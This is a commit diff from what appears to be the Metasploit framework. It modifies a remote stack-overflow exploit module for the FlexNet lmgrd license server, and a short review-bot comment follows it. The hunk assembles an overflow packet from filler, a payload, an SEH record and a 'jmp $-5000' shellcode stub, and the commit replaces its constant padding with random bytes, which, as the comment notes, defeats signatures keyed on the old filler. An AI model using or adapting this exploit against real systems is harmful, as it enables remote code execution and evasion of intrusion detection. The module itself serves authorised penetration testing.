randomization when possible for flexnet_lmgrd_bof
parent
cafe803217
commit
c823e8099e
|
@ -185,12 +185,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if target.name =~ /Debug/
|
||||
pkt_data << "a" * (65535 - header_length)
|
||||
else
|
||||
pkt_data << "a" * (target['ShellcodeOffset'])
|
||||
pkt_data << "a" * target['ShellcodeOffset']
|
||||
pkt_data << my_payload
|
||||
pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
|
||||
pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
|
||||
pkt_data << generate_seh_record(target.ret)
|
||||
pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
|
||||
pkt_data << "c" * (65535 - pkt_data.length - header_length)
|
||||
pkt_data << rand_text(65535 - pkt_data.length - header_length)
|
||||
end
|
||||
|
||||
pkt = create_packet(pkt_data)
|
||||
|
@ -201,4 +201,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
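Review bot: Nothing in the first hunk records why only the two pads after the payload moved to `rand_text`, while the `"a"` runs before the payload and in the Debug branch stay constant. This assumes the `rand_text` lines are the new side, since the page has lost its +/- markers. A one-line comment above the `else` body would make that choice reviewable, for example `# leading filler stays fixed because <reason>; pads after the payload are random`. For anyone maintaining detections for this module, content signatures keyed on the old constant `"b"`/`"c"` filler will no longer match traffic from the new code, so rules should rest on protocol-level properties rather than pad bytes. The enclosing method starts above the hunk, so how `header_length` is derived is not visible here.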